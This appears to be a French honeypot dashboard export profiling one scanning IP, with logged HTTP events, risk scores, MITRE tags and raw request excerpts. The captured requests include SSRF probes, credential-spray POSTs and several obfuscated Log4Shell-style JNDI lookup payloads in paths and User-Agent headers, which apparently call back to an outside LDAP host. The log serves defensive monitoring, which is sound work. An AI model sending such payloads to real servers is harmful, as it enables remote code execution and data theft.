Profil de menace
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.116.0/24)
Période analysée : 2026-07-03 → 2026-08-02
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.116.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.116.0/24, ≥3 pairs)
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.116.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 139 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
139 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
139 événement(s) — page 1/3
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8889 · HTTP | http | SSRF interne ssrf internal · via HTTP:8889 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8889
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8889 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8889 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | SSRF interne ssrf internal · via HTTP:8880 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | SSRF interne ssrf internal · via HTTP:8880 · (tentative d'exploit) · → /http%3A%2F%2Fw00te8b527c1d.com | Élevée | Moyen · 63 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /http%3A%2F%2Fw00te8b527c1d.com UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/http%3A%2F%2Fw00te8b527c1d.com
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/http%3A%2F%2Fw00te8b527c1d.com
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 63
Confiance : Confiance 54 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
Payload (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Moz
Requête brute (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | SSRF interne ssrf internal · via HTTP:8880 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
54%
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8444 · HTTP | http | SSRF interne ssrf internal · via HTTP:8444 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8444
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8444 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8444 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8300 · HTTP | http | SSRF interne ssrf internal · via HTTP:8300 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8300
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8300 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8300 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8200 · HTTP | http | SSRF interne ssrf internal · via HTTP:8200 · (tentative d'exploit) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 58 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozi
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) | Élevée | Moyen · 46 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /
Émulateur
HTTP
WAF
7
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8089
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tags WAF: query-overlong, sap-sapcontrol-path · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 46
Confiance : Confiance 100 % — 2 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Ligne de requête
User-Agent
—
Règles WAF
query-overlong
sap-sapcontrol-path
Payload (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Requête brute (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
|||||||
| TCP | 8087 · HTTP | http | Scan de ports port scan syn · via HTTP:8087 · (reconnaissance) | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) · → /${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:q… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:qn:-i}${8r1u:-:}${4f:c:th:-l}${ekfm:-d}${gih7:-a}${i3… UA ${${eib:iyr:gvwb:-j}${d:-n}${fe:-d}${q:-i}${e83l:y5k:sa:-:}${hv…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:qn:-i}${8r1u:-:}${4f:c:th:-l}${ekfm:-d}${gih7:-a}${i3:-p}${sa4y:a:d20q:-:}${h1yp:-/}${dh4:q4j:-/}${kbu:-P}${z3x:nt:an:-A}${98r:a:-l}${8b2l:-0}${7y2:1bn:s:-c}${pn6:3qm5:--}${${2ur:s19t:-s}${bk1:-y}${0e:n:x6iw:-s}${97l:-:}${3jp:m03p:08:-j}${of9:8gxn:zovu:-a}${hftv:w7ae:vlg:-v}${p8e:98:-a}${3od:2:d2rj:-.}${v:0u:-v}${z:pv:x0tv:-e}${qi:-r}${y6z:-s}${ij:-i}${0t15:3m67:htw:-o}${4d5r:1xd:-n}}${l7x:-.}${vl2d:-e}${nj96:7:67o:-7}${pj:u:xdpl:-d}${38:i:b:-b}${og:7:-8}${bk9:0
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8085
Chemin / cible
/${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:qn:-i}${8r1u:-:}${4f:c:th:-l}${ekfm:-d}${gih7:-a}${i3:-p}${sa4y:a:d20q:-:}${h1yp:-/}${dh4:q4j:-/}${kbu:-P}${z3x:n…
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${eib:iyr:gvwb:-j}${d:-n}${fe:-d}${q:-i}${e83l:y5k:sa:-:}${hv:-l}${5:-d}${xl:pndo:g1:-a}${r:u3m:-p}${ah:qsf0:-:}${rm:-/}${72j:s:a:-/}${m5jt:f:b:-U}${u:-A}${4:-l}${fn:fg:e:-0}${beg:-c}${r:--}${${y:f…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:qn:-i}${8r1u:-:}${4f:c:th:-l}${ekfm:-d}${gih7:-a}${i3:-p}${sa4y:a:d20q:-:}${h1
Requête brute (extrait)
PUT /${${9:un:wb26:-j}${sjd:-n}${dv8k:br85:-d}${9:qn:-i}${8r1u:-:}${4f:c:th:-l}${ekfm:-d}${gih7:-a}${i3:-p}${sa4y:a:d20q:-:}${h1yp:-/}${dh4:q4j:-/}${kbu:-P}${z3x:nt:an:-A}${98r:a:-l}${8b2l:-0}${7y2:1bn:s:-c}${pn6:3qm5:--}${${2ur:s19t:-s}${bk1:-y}${0e:n:x6i
|
|||||||
| TCP | 8085 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8085 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8085
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1593 {"username"
|
|||||||
| TCP | 8085 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8085 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8085
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2976 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 8085 · HTTP ALT 8085 | http-alt-8085 | Injection PHP php injection · via HTTP ALT 8085:8085 · (tentative d'exploit) | Faible | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
HTTP-ALT-8085
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8085
Chemin / cible
—
Service
HTTP ALT 8085
Payload
ZSDLKFJ2 /${${p8:-j}${mua:-n}${juan:9:a:-d}${bgy:9q8k:dlc:-i}${j3:-:}${85ak:o6:-l}${b2f:o0:vpm:-d}${rp:6c:-a}${4zf:msdr:i:-p}${m
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${p8:-j}${mua:-n}${juan:9:a:-d}${bgy:9q8k:dlc:-i}${j3:-:}${85ak:o6:-l}${b2f:o0:vpm:-d}${rp:6c:-a}${4zf:msdr:i:-p}${m
Requête brute (extrait)
ZSDLKFJ2 /${${p8:-j}${mua:-n}${juan:9:a:-d}${bgy:9q8k:dlc:-i}${j3:-:}${85ak:o6:-l}${b2f:o0:vpm:-d}${rp:6c:-a}${4zf:msdr:i:-p}${mtw:-:}${md:0sq:qgo:-/}${f:p7:-/}${s:tha:-P}${wnt:faim:-A}${jws7:jhl:ymj:-l}${1:-0}${i:u:-c}${a:--}${${lqx7:fw:-s}${72r:i9:-y}${w
|
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) · → /${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i}${gx7w:i6c4:yx:-:}${s:5:-l}${sa8u:wlr7:-d}${qzx:-a}… UA ${${drb:-j}${1ze:-n}${4b3:-d}${c:jvy:-i}${k:-:}${u2m7:4:-l}${0r…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
